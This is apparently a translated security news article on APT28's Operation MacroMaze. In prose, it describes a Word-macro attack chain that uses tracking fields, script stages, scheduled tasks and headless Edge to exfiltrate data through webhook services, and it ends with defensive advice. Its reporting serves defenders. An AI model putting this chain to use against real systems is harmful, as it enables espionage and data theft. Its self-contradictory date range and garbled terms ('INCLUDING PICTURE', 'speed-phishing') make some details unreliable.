APT28 MacroMaze operation shows that simple can be more dangerous than complex

Between late 2025 and early 2025, cyber security researchers detected a renewed campaign attributed to the group known as APT28., also identified in the literature as Fancy Bear or Strontium. S2 Group's LAB52 intelligence team named this operation Operation MacroMaze and described it as an example of how sophisticated actors can achieve targets using surprisingly simple tools and legitimate services as support infrastructure. You can consult the technical report of LAB52 for more details on their official blog: Operation MacroMaze - LAB52.

The point of entry was directed and well-worked with embedded documents that, when opened, activated an automatic sequence to verify that the recipient had interacted with the file. For this purpose, the attackers took advantage of a common field in Word documents, the INCLUSPICTURE field, which orders the processor to recover an image from a remote URL. By pointing this field at a web request reception service (e.g., website), the adversaries received the HTTP request when the file was open and, with that simple call, confirmed that the trap had worked. This use of the resource is similar to the well-known "tracking pixels" in digital marketing: an external request that reveals the opening of an element and that can store useful metadata for the attacker - a well-explained technique in guidelines on follow-up pixels such as that of Cloudflare.

Once the interaction was checked, the documents acted as droppers: they contained macros designed to execute additional stages that established persistence and downloaded later loads. LAB52 observed small variations in these macros over the months analyzed, but maintained a common logic: running a VBScript that in turn launched a CMD file to create programmed tasks and shoot a batch file. That chain of small profits - VBScript, CMD and batch - was combined to orchestrate the execution of a payload embedded in HTML encoded in Base64 that was renderized by Microsoft Edge.

The most operationally ingenious part was the use of the browser as a control and exfiltration channel.. In one of the variants, the encoded HTML was run in a headless mode or in a window moved out of the screen, thus avoiding user attention. The renderized content again contacted an endpoint controlled by the attackers to obtain instructions, executed the commands received on the compromised machine, captured the output and sent it back as an HTML file submitted by a form to the same type of webhook service. That is, they used the standard functionality of HTML forms to drive data to an external service, minimizing persistent traces on disk. The technique fits into exfiltration patterns by web services discussed on knowledge bases such as the MITRE ATT & CK frame: T1567 - Exfiltration Over Web Service.

LAB52 documented a tactical evolution in the scripts: the initial versions were betting on the "headless" execution of the browser, while later variants resorted to keyboard simulation (SendKeys) and tactics to avoid dialog windows and security warnings. They also recorded attempts to master the running environment by closing Edge processes to ensure that the malicious session had exclusive browser control. That is, it was not a try to introduce complex malware, but to channel native utilities and public services to keep operations low profile.

The technical and strategic lesson is clear: sophistication does not always depend on advanced tools, but on the design of the attack flow. The combination of office macros, simple scripts, a modern browser such as running engine and third party services to orchestrate telemetry and exfiltration - all legitimate elements in themselves - allows an attacker to build a chain very difficult to detect if the right signals are not monitored. The groups such as APT28 also have a proven repertoire of operations against political objectives and organizations in Europe, something documented by analysts and the intelligence community: reference information on the group can be found in the MITRE ATT & CK tab: APT28 - MITRE.

What can organizations do to reduce the risk of such campaigns? Prevention is to limit the automatic execution of active content in documents, deactivate default macros except in controlled scenarios, set up policies that prevent the execution of external processes from office applications and monitor unusual outgoing requests that target third party services used as proxy by attackers. It is also relevant to implement behavior detection in endpoints to identify patterns such as the creation of unexpected scheduled tasks, Edge's execution by unusual processes, or the generation of temporary HTML files with encoded content. To better understand the adversary's capabilities and the techniques he uses, the community's repositories and technical publications are a good starting point, in addition to the LAB52 report itself mentioned.

Operation MacroMaze shows that basic safety hygiene remains decisive:: restrict macro, apply network segmentation, record and analyse outgoing requests and educate users about speed-phishing are not glamorous measures, but are the most effective in the face of campaigns that are based on the combination of social engineering and the reuse of legitimate services. If you want to deepen how fields like INCLUDING PICTURE are used in Microsoft documents, official documentation about API and Word fields is useful: INCLUDING PICTURE - Microsoft Docs.

In short, the threat continues to evolve and is based on operational creativity rather than technical complexity. That is a signal for administrators and security officials: to monitor the humblest parts of the environment - a document, a small script or an HTTP call to a public service - can make the difference between detecting an intrusion in time or losing control of a critical team.